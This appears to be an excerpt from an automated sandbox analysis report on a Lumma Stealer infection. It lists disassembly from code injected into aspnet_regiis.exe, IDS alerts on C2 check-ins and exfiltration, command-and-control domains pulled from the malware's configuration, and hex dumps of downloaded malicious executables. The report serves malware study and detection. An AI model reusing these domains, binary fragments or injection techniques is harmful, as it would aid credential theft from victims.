                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, bx10_2_7707FC1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+48h]10_2_7707BC30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ecx10_2_77086C5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_77090480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], B62B8D10h10_2_77083490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h10_2_7709CC90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edi10_2_7709BCB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [esi+000000D8h]10_2_77073CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h10_2_77073CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-69DA3076h]10_2_77084CDE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3602324Eh10_2_7709D310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebp, word ptr [eax]10_2_7709D310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+2Ch]10_2_7706D321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-5A7985B9h]10_2_77096B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push F2FFBC90h10_2_7706A34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebp10_2_77065B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebp10_2_77065B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, dword ptr [ecx+eax]10_2_77098B93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 16194952h10_2_77096230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, FFFFFFFFh10_2_77074249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_77087A82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, dword ptr [ebp-38h]10_2_77080AE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edi10_2_7709BAE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx10_2_77074914
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx10_2_7707E110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx10_2_7707E110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax10_2_77076940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx10_2_77083160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp al, 5Ch10_2_77062170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_77085170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]10_2_770770F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_770879B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push edi10_2_770881E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h10_2_77084017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h10_2_77080040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, edx10_2_7709D040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], DD26B4F7h10_2_7709D040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0A5A5402h]10_2_7707D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx10_2_7707D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ecx10_2_770808EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]10_2_770778EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]10_2_770770F6

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2057415 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com) : 192.168.2.10:57028 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057346 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (repostebhu .sbs) : 192.168.2.10:54003 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057350 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tamedgeesy .sbs) : 192.168.2.10:53617 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057348 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rottieud .sbs) : 192.168.2.10:52947 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057340 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explainvees .sbs) : 192.168.2.10:62049 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057338 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ducksringjk .sbs) : 192.168.2.10:52620 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49802 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057334 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brownieyuz .sbs) : 192.168.2.10:52884 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49818 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49803 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49883 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057415 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com) : 192.168.2.10:63519 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49839 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49887 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pragapin .sbs) : 192.168.2.10:59435 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49904 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49915 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49914 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49867 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thinkyyokej .sbs) : 192.168.2.10:55082 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49816 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057344 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relalingj .sbs) : 192.168.2.10:55336 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49934 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49926 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49835 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49945 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.10:49903 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49794 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49803 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49803 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49793 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49914 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49816 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49816 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49802 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49802 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49934 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49814 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49945 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49818 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49818 -> 188.114.97.3:443
                Source: Malware configuration extractorURLs: thinkyyokej.sbs
                Source: Malware configuration extractorURLs: explainvees.sbs
                Source: Malware configuration extractorURLs: tamedgeesy.sbs
                Source: Malware configuration extractorURLs: rottieud.sbs
                Source: Malware configuration extractorURLs: ducksringjk.sbs
                Source: Malware configuration extractorURLs: brownieyuz.sbs
                Source: Malware configuration extractorURLs: repostebhu.sbs
                Source: Malware configuration extractorURLs: relalingj.sbs
                Source: Malware configuration extractorURLs: pragapin.sbs
                Source: unknownDNS query: name: pastebin.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 14 Nov 2024 11:19:56 GMTContent-Type: application/octet-streamContent-Length: 3125704Last-Modified: Tue, 20 Aug 2024 12:02:17 GMTConnection: keep-aliveETag: "66c485c9-2fb1c8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d4 4e 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 14 Nov 2024 11:19:56 GMTContent-Type: application/octet-streamContent-Length: 3125704Last-Modified: Tue, 20 Aug 2024 12:02:17 GMTConnection: keep-aliveETag: "66c485c9-2fb1c8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d4 4e 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 14 Nov 2024 11:20:17 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Fri, 17 May 2024 16:26:03 GMTConnection: keep-aliveETag: "6647851b-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 14 Nov 2024 11:20:17 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Fri, 17 May 2024 16:26:03 GMTConnection: keep-aliveETag: "6647851b-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 